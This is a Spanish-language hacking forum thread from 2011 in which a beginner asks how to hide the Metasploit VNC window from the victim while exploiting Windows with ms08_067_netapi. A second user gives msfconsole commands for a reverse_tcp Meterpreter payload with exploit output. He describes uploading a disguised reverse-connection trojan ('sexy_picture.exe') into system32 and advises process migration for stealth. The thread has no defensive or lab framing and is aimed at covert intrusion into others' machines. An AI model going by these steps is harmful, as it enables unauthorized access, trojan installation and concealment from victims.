Duda con Metasploit y Payload vncinject.

Iniciado por oliver91, 29 Abril 2011, 22:11 PM

0 Miembros y 1 Visitante están viendo este tema.

oliver91

Hola que tal, soy nuevo acá, estoy iniciando en este magnífico mundo del hack, he avanzado un poco gracias a esta gran comunidad.
Bien pues quisiera hacer una pregunta, ojala que no ofenda por mi novatez.
Utilizo el exploit: Windows/smb/ms08_067_netapi.
Y el payload: windows/vncinject/bind_tcp.
Esto para obtener gráficamente la PC remota.
Todo va perfecto solo que en la PC remota aparece todo lo que yo hago y la ventana de metasploit, y obviamente si la cierra, adiós intrusión.
Mi pregunta es: hay alguna forma de hacer esto pero oculto?
Es decir ocultar la ventana de metasploit y que no se vea todo lo que se realiza desde mi PC?
Gracias de antemano y disculpen si es una pregunta estúpida.
Saludos

CloudswX

Pues te dire..

En mi caso particular primero utilizo el payload METERPRETER:
> set PAYLOAD windows/meterpreter/reverse_tcp

Luego de esto configuro todas mis variables:
> set RHOST 192.168.0.4
> set LHOST 192.168.0.5
> set TARGET 0

Y hecho esto exploto:
Started bind handler
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:Spanish
Selected Target: Windows XP SP2 Spanish (NX)
Triggering the vulnerability...
Sending stage (723456 bytes)
Meterpreter session 1 opened (192.168.0.4:4367 -> 192.168.0.5:4444)
meterpreter >


Una vez conseguida la sesion Meterpreer le subo un troyano de conexion inversa bien compilado haciendo uso de los comandos Upload y Download que sirven para subir y bajar archivos de la maquina remota.

meterpreter > upload sexy_picture.exe c:\\windows\\system32
[*] uploading  : sexy_picture.exe -> c:\windows\system32
[*] uploaded   : sexy_picture.exe -> c:\windows\system32\sexy_picture.exe
meterpreter >


Y despues que tienes un troyano dentro no necesitas mas nada. Asi es como lo hago en mi casa y nunca le ha saltado nada a la ventana de la pc remota.





«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

oliver91

Que tal, Muchas gracias por responder, se como subir y bajar archivos desde meterpreter pero mi problema es que no tengo nada que subirle a esa PC, no tengo algún troyano, o virus, es por eso que preferí usar la opción VNC que trae metasploit, mi único problema es que en la PC remota aparece la ventana de meterpreter, habrá alguna forma de evitar que aparezca?, no sé, desde la consola de comandos, desde el registro o alguna opción del mismo payload?
De verdad muchas gracias por tomarte la molestia de responder. Gracias

CloudswX

Cuando consigas sesion con el meterpreter migra a algun proceso activo en la pc remota, con esto es suficiente para que estes camuflajeado mientras operas.


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

oliver91

Muchas gracias una vez más por tu respuesta, quieres decir que si migro por ejemplo a winlogon o al mismo explorer desde el meterpreter ya no saldrá la ventana del metasploit?Disculpa la ignorancia.
También probé a cerrar de inmediato dicha ventana y va perfecto, no aparece ningún proceso sospechoso, pero mi problema sigue siendo que salta esa ventana, lo cual levantara sospechas en seguida.
Gracias de verdad por tus respuestas.

CloudswX

Cita de: oliver91 en  5 Mayo 2011, 18:17 PM
Muchas gracias una vez más por tu respuesta

Pues para estamos hermano, para compartir los conocimientos..

Prueba migrando a algun proceso y luego inyecta el vcn..


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

oliver91

#6
Gracias de verdad amigo, por gente como tú, principiantes como yo podemos avanzar e ilusionarnos con alguna vez ayudar a alguien más como lo han hecho con nosotros.
En cuanto a lo de migrar el proceso de meterpreter a algún otro no me ha funcionado, migre al explorer.exe y sigue apareciendo la ventana de metasploit.
No sé si este haciendo algo mal, pero si migro por ejemplo a explorer.exe lo que estoy migrando es el proceso meterpreter no? O me faltara algún paso?
Hago lo siguiente una vez en meterpreter:
meterpreter > migrate 1572
  • Migrating to 1572...
  • Migration completed successfully.
    meterpreter > exit
  • Meterpreter session 1 closed.  Reason: User exit
    msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
    payload => windows/vncinject/bind_tcp
    msf exploit(ms08_067_netapi) > exploit
    Pienso que estoy mal en salir de meterpreter, porque no tendría caso migrarlo y salir no?
    Gracias por tu tiempo amigo.

CloudswX

#7
Pues decirte que es exactamente eso que piensas, no tiene sentido migrar de proceso para cerrar posteriormente el meterpreter.

Te dire que el vnc funciona de forma similar a un troyano primero debes INSTALAR una parte del VNC que hara de server. Cuando usas ese payload de vnc realmente estas abriendo una sesion sobre el proceso de Remote Desktop por lo que te salta esa ventana.

Chequeate este video tutorial de Alex_shell_root que en mi opinion es uno de los mas iluminados con el metasploit.

http://www.youtube.com/watch?v=k30889rxcOQ

Ojala te sirva de algo.


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

oliver91

Gracias amigo y mira que lo del video es exactamente lo que hago, pero esa ventana que dice Metasploit Courtesy Shell, es mi problema. Bueno amigo de verdad muchas gracias por tu interés y mejor empiezo a buscar otra manera de ingresar sin que se puedan dar cuenta, o hacer todo desde una consola remota.
Muchas gracias por tu ayuda!!!!!!!!!!!!!!